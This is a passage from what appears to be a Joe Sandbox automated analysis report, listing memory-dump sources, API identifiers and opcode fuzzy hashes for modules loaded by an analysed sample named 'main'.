                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                                                                    • Instruction ID: c633060daa4c9abe3e84b457e38c13a3d1e2407361f930bc72ea1884ce74e30f
                                                                    • Opcode Fuzzy Hash: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                                                                    • Instruction Fuzzy Hash: 6FF0BB6260878662E5628F44F8C03B96254FFC57A4F480235EDCD466F1EF3ED9899302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                                                                    • Instruction ID: 46fd059dadb52b5eec2fb6b563bfa6a917d9169ad0ea29795ff77f7e7a7fd8cf
                                                                    • Opcode Fuzzy Hash: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                                                                    • Instruction Fuzzy Hash: D6F0BB6260878662E5628F44FCC03B96258FFC67A4F480236EDCD466F1EF3ED9859302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                                                                    • Instruction ID: 93bd4c77cd10613a2b95c17216154410be8737cc1a0adb06f5fae28ac460e17d
                                                                    • Opcode Fuzzy Hash: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                                                                    • Instruction Fuzzy Hash: B7F0BB6260878662E5628F44F8C03B96254FFC67A4F480236EDCD466F1EF3ED9859702
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
                                                                    • Instruction ID: 86ce30af62eefcd1e362b89dd4a3caa6e9a74b2ee184367626b2dbb0807cdfa8
                                                                    • Opcode Fuzzy Hash: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
                                                                    • Instruction Fuzzy Hash: 6EF06DA2A0C75B82E5529F10F8447BA6254AF447A8F48023BDD9D866B2EF2CD9899300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
                                                                    • Instruction ID: 1a299213a822cc5f253556a3a435b4da673161fc3fbd51081930cf426b5c8ecc
                                                                    • Opcode Fuzzy Hash: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
                                                                    • Instruction Fuzzy Hash: 34F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
                                                                    • Instruction ID: 2f7950778ae422de24e56455a1765d966b00fb18ad4645a8d2ceac97e60131d9
                                                                    • Opcode Fuzzy Hash: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
                                                                    • Instruction Fuzzy Hash: 56F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
                                                                    • Instruction ID: 0e92d6aa44722bc36fcf251fd76824ec65a13b4387d5e34c320950e713e27049
                                                                    • Opcode Fuzzy Hash: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
                                                                    • Instruction Fuzzy Hash: 1BF090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
                                                                    • Instruction ID: dd454f8397a2f4b4e64eb1f64dba90335dafc04b0a8137ec97555e6c13e4577c
                                                                    • Opcode Fuzzy Hash: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
                                                                    • Instruction Fuzzy Hash: 30F090A2A0C75B82E6529F10F8447BA6254FF447E8F084237DDDD876B1EF2CD9899300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 2421130e589a518d8d6a899e34f192d6eae1fdef6248c36e69ef4aa482b17227
                                                                    • Instruction ID: 0a1cb23a89c6eccfd8248f48028f52706b0cd93caf7c881a3af3e3a2321808a9
                                                                    • Opcode Fuzzy Hash: 2421130e589a518d8d6a899e34f192d6eae1fdef6248c36e69ef4aa482b17227
                                                                    • Instruction Fuzzy Hash: 23F06262A0874652E5529F88B8803797354EF40795F480336EE5DCAAA0DF2DE9C99780
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 26abaf404a186cce4437ed2da7a72a2f3e0e06abd906e563cf0bcb7fe33f66ef
                                                                    • Instruction ID: 972090fdc100d06f01bda456361739ee713a832b9ccd39a4697aafc4fa87efc4
                                                                    • Opcode Fuzzy Hash: 26abaf404a186cce4437ed2da7a72a2f3e0e06abd906e563cf0bcb7fe33f66ef
                                                                    • Instruction Fuzzy Hash: E3F06262A0874652E5529F88B8803797354EF40795F480336EE5D8A6A0DF2DE9C99780
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 0879c6a44524d8b251e147b057380ee73abba84e16f301a98f496365444c6721
                                                                    • Instruction ID: 12c861db2c6e2faf6c27d4cd2576df9c8edc95733573d16c4334fc2fb7d1b154
                                                                    • Opcode Fuzzy Hash: 0879c6a44524d8b251e147b057380ee73abba84e16f301a98f496365444c6721
                                                                    • Instruction Fuzzy Hash: 68F06262A0874652E5529F88B8803797354EF40795F480336EE5D8A6A1DF2DE9C99780
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: c0cddd2865619a54ec6232293f106fb97064ae862a9b86bbce8474b1505a66a2
                                                                    • Instruction ID: 1af30345f51afb651f545caf6c92e7dc0301563f9395d655c52f103e206d5e01
                                                                    • Opcode Fuzzy Hash: c0cddd2865619a54ec6232293f106fb97064ae862a9b86bbce8474b1505a66a2
                                                                    • Instruction Fuzzy Hash: 1AF06262A0874652E5529F88B8803797354EF40795F480336EE5D8A6A0DF2DE9C99780
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 0ea0f9f3e0855ebec4d02b887b4cf1966552980e8b767d39c0e2875b2443d339
                                                                    • Instruction ID: 91f878f9043d06ed9e3ce852b52380d2870e9c5b27c78a9bf4f2b6e68adbc613
                                                                    • Opcode Fuzzy Hash: 0ea0f9f3e0855ebec4d02b887b4cf1966552980e8b767d39c0e2875b2443d339
                                                                    • Instruction Fuzzy Hash: 40F0626260874652E5529F88B8803797354EF40795F480336EE5D8AAA0DF2DE9C99780
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1125407320-0
                                                                    • Opcode ID: 53d82a57b16911a5b1527cb144a80cb920e2af3c5daf851a095dbd904dc25674
                                                                    • Instruction ID: 76e48ea39838b76616ca1c5565200e8488794caa168b7993921f1bfdd7fb0a09
                                                                    • Opcode Fuzzy Hash: 53d82a57b16911a5b1527cb144a80cb920e2af3c5daf851a095dbd904dc25674
                                                                    • Instruction Fuzzy Hash: 9C314160E0DF0382F7705BA7D89427C226AAF81770F9003B9D47D466F6EF2DE8419201
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1125407320-0
                                                                    • Opcode ID: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                                                                    • Instruction ID: 5cbd6e0f43837169666d4f5b09b899f6a8e5a4a6c1d290eb45965486bb63f2d6
                                                                    • Opcode Fuzzy Hash: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                                                                    • Instruction Fuzzy Hash: 7331D9A2E2970382F6306F68A8843792251FF84775F640331E4FD4A6F5DE2DE9459E81
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1125407320-0
                                                                    • Opcode ID: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                                                                    • Instruction ID: c033721de812d5e5a5c02b5a72d2c37f3e419fa2cd162b600545b5ee6b515677
                                                                    • Opcode Fuzzy Hash: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                                                                    • Instruction Fuzzy Hash: 77312A20F0D60782F635DF68E8842B82255AF44370F2003B5E5FD467FAEE2DE9959E90
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1125407320-0
                                                                    • Opcode ID: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                                                                    • Instruction ID: 73b34838b55f8c872939271a168244a93b01931b97a2c116399ccd532d40d3cc
                                                                    • Opcode Fuzzy Hash: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                                                                    • Instruction Fuzzy Hash: E9311A60E0D6C2A2F7209BA8E8C42782251AF46770F54037AD9FE467F2CE2EE6455652
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1125407320-0
                                                                    • Opcode ID: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                                                                    • Instruction ID: c647a3e78296f41c0fa26a15a73ab8ee7f1f1b9dfdee4252dca916f587bc6732
                                                                    • Opcode Fuzzy Hash: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                                                                    • Instruction Fuzzy Hash: E3310C21F0D603A2F6705B65E88427C2265AF44770F600377D8FE466F7DE2CEA85A781
                                                                    APIs
                                                                      • Part of subcall function 00007FF6BFD61360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6BFD684AF), ref: 00007FF6BFD6137E
                                                                    • SleepEx.KERNEL32 ref: 00007FF6BFD688DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
